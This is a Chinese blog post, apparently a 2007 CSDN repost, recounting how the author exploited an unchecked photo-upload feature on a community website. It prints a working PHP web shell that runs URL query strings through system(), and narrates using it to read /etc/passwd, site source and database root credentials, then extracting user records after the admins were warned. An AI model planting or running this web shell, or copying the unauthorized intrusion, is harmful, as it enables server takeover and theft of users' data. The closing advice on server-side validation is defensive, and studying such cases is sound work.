php做网站安全吗,php做社区网站的安全性

博主发现一个社区网站的‘我的照片’上传功能存在重大安全漏洞,允许上传PHP文件并执行,通过两个PHP脚本,博主成功获取了数据库信息和网站源码。尽管网管在接收到警告后移除了上传目录,但这一临时措施影响了用户正常功能。此事件强调了服务器端安全验证的重要性,警示开发者要防范恶意用户利用URL直接传递恶意数据。
摘要由CSDN通过智能技术生成

目前,我发现某个社区网站中的一个上传“我的照片”功能有着很大的安全隐患,因为上传程序未对上传的文件做分析,从而我可以上传一个test.php的文件, 然后服务器上的名字就为?????.php(?????为数字),

我的PHP内容如下:

$dbs=mysql_connect($strDBHost,$strDBUser,$strDBPassword);

……

mysql_close($dbs);

?>

当然……中我只作了个测试,没有真正使用数据库,但是我以另一个PHP,?????.php,内容如下:

$query=getenv("QUERY_STRING");

$command=urldecode($query);

$stdout=system("$command");

echo "$stdout";

?>

成功的取得

$strDBHost = "?.?.?.?";

$strDBPassword = "????";

$strDBUser = "root";

并连上数据库

然后用后一个PHP把上传的PHP命名为CMD.PHP和DB.PHP

成功取得/ETC/PASSWD和该网站的首页面MAIN.PHP源码。

然后我发信警告网管,但是他们在第一天没及时修补漏洞,于是我对数据库进行分析,并上传了个MB.PHP,成功的得到数据库内的用户信息。

今天他们采取的修补手段是把那个可以上传的目录移去,不过这将导致用户暂时不能浏览、上传照片。

所以进行此类设计时,应该考虑到恶意用户通过直接调用url,把恶意数据传个程序,而不能以为网页在服务器端就安全了!

posted on 2007-07-16 09:38 plm 阅读(979) 评论(0)  编辑 收藏 引用 网摘

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值